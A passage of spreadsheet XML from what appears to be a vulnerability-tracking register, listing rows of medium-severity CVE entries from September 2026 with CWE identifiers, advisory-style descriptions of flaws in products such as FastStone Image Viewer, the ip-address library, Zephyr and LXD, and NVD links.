      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eleveo Quality Management 9.7.0. Affected by this vulnerability is an unknown functionality of the file Scorecard.jsp of the component Questionnaire Audio Upload. The manipulation leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101142</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101144</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Eleveo Call Recording Software 9.7.0. This affects an unknown part of the file /callrec/searchAction.do of the component Query Builder. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101144</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101202</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in FastStone Image Viewer up to 8.3. The affected element is an unknown function of the component TGA Image Handler. Executing a manipulation can lead to out-of-bounds write. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101202</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101203</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in FastStone Image Viewer up to 8.3. The impacted element is an unknown function of the component 1bpp RLE Decoder. The manipulation leads to out-of-bounds write. The attack can be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101203</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101204</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FastStone Image Viewer up to 8.3. This affects an unknown function of the file FSViewer.exe of the component TGA Image Handler. The manipulation results in out-of-bounds read. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101204</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101205</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in FastStone Image Viewer up to 8.3. This impacts an unknown function of the component PCX Decoder. This manipulation causes out-of-bounds read. The attack may be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101205</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101911</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the Address6 constructor, Address6.isValid, and parse code in src/ipv6.ts accept unbounded strings and expand invalid characters through RE_BAD_CHARACTERS into large diagnostics. Material impact occurs only when an application accepts a very large attacker-controlled field and passes it to Address6 parsing without an earlier length bound. Common URL and header limits, and common body-parser defaults, generally constrain the effect; common defaults typically exclude 32 MiB fields. Megabyte-scale fields can cause a synchronous stall and high transient memory use, approximately 16 MiB can trigger an invalid string length exception, and process termination occurs at approximately 32 MiB. The affected entry points include Address6.isValid and construction paths that reach parse. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101911</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101912</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-843</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the isInSubnet and isHostInSubnet methods in src/common.ts compare masked binary strings without validating that both operands use the same IP family. A cross-family containment check whose leading address bits match makes the masked strings compare equal even though IPv4 and IPv6 do not share an address space. An allowlist or denylist decision can therefore classify an address outside the intended range as contained. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101912</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101913</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-918</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.5.1, the Address6 isLinkLocal method in src/ipv6.ts recognizes only fe80::/64 instead of the complete fe80::/10 IPv6 link-local range. An attacker-controlled address elsewhere in fe80::/10 can therefore pass a trust-boundary check that relies on isLinkLocal. The same address is identified as link-local by getType and getScope, exposing the inconsistent classification. A successful bypass can reach an on-link host outside the intended trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101913</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102414</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>pbkdf2 through 3.1.6 re-hashes passwords longer than the digest's block size on every iteration in its JavaScript fallback (lib/sync.js). A password longer than the block size (64 bytes, or 128 bytes for sha384 and sha512) is passed to HMAC as the key on every iteration, and HMAC hashes such keys in full each time. Cost is therefore O(iterations × password length), and a long password can block the event loop. The fallback is used by pbkdf2Sync and pbkdf2 on Node.js before 0.12, on Bun (1.0.0 through 1.1.34, and 1.2.6 and later), and on Deno 2.9.0 and later, because their native pbkdf2Sync fails the library's feature check. It is also used when lib/sync.js is imported directly. Node.js 0.12 and later, and browser builds (which use lib/sync-browser.js), are not affected. Applications that enforce a reasonable maximum password length are not meaningfully affected.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102414</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18415</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>ieee802154_send() in subsys/net/l2/ieee802154/ieee802154.c copies the outgoing packet into a single fixed 125-byte transmit buffer (tx_frame_buf_pool, sized IEEE802154_MTU). In builds with CONFIG_NET_L2_IEEE802154_FRAGMENT enabled (the default whenever CONFIG_NET_6LO is set), the branch taken when 6LoWPAN fragmentation is not required performed an unchecked net_buf_add_mem(frame_buf, pkt_buf-&gt;data, pkt_buf-&gt;len). The only guard was __ASSERT_NO_MSG() inside net_buf_simple_add(), which is compiled out without CONFIG_ASSERT, so an oversized packet silently overran the frame buffer.
The defect is not reachable from the radio: for NET_AF_INET6 packets ieee802154_6lo_encode_pkt() compares the whole packet length against IEEE802154_MTU and takes the fragmentation path when it does not fit, so every buffer copied on the unfragmented branch is within bounds. It is reachable through NET_AF_PACKET sockets bound to an 802.15.4 interface: for NET_SOCK_RAW the 6LoWPAN block is skipped entirely and for NET_SOCK_DGRAM it returns early on the address-family test, leaving no length validation anywhere on the transmit path (net_context_sendto() and net_if_tx() apply none, and pkt_buffer_length() does not clamp the allocation for this L2).
An application — or, in a CONFIG_USERSPACE build, an unprivileged application thread using the zsock_socket()/zsock_sendto() syscalls — can therefore drive a supervisor-mode out-of-bounds write of chosen bytes past the 125-byte pool buffer. With the default CONFIG_NET_BUF_FIXED_DATA_SIZE of 128 bytes the overrun is bounded to roughly ll_hdr_len + 3 bytes; with CONFIG_NET_BUF_VARIABLE_DATA_SIZE a single storage buffer can be as large as CONFIG_NET_PKT_BUF_TX_DATA_POOL_SIZE, making the overrun far larger. The consequence is corruption of memory adjacent to the pool, with a crash or further compromise of kernel state as the practical impact.
The fix validates ll_hdr_len + net_pkt_get_len(pkt) + authtag_len against IEEE802154_MTU before any copy and adds a tailroom-checking copy_pkt_to_frame() helper that returns -EMSGSIZE instead of overrunning the buffer. The same change also linearizes the whole net_buf chain into one MAC frame, so packet storage boundaries no longer become frame boundaries on the wire.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18415</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82929</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module uses the same hard-coded SSH host keys on every device, with no per-device key generation. An attacker who extracts these keys from the firmware can set up a rogue SSH server that clients will trust without warning, enabling man-in-the-middle attacks and credential interception.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82929</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86335</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in imageDownload in Canonical LXD before 5.0.10, 5.21.8, and 6.10 on Linux allows a project-restricted client to access private images from other projects via local fingerprint reuse during image or instance import requests.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86335</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92103</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to make the client hold up to about 16 MiB per connection in frames it should reject, consuming client memory.
Mint.HTTP2.Frame.decode_next/2 in lib/mint/http2/frame.ex compares a frame with the client's max_frame_size (16,384 bytes by default) only once the whole declared payload has arrived. Until then it returns :more, and Mint.HTTP2 keeps every received byte in the connection buffer. A server can declare a frame length of up to 16,777,215 bytes and withhold the last byte, keeping roughly 1,024 times the advertised limit buffered for as long as the connection stays open. The server has to send every byte the client buffers, so there is no amplification, and the buffer stops at the 24-bit frame length limit.
This issue affects mint: from 0.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92103</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94194</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
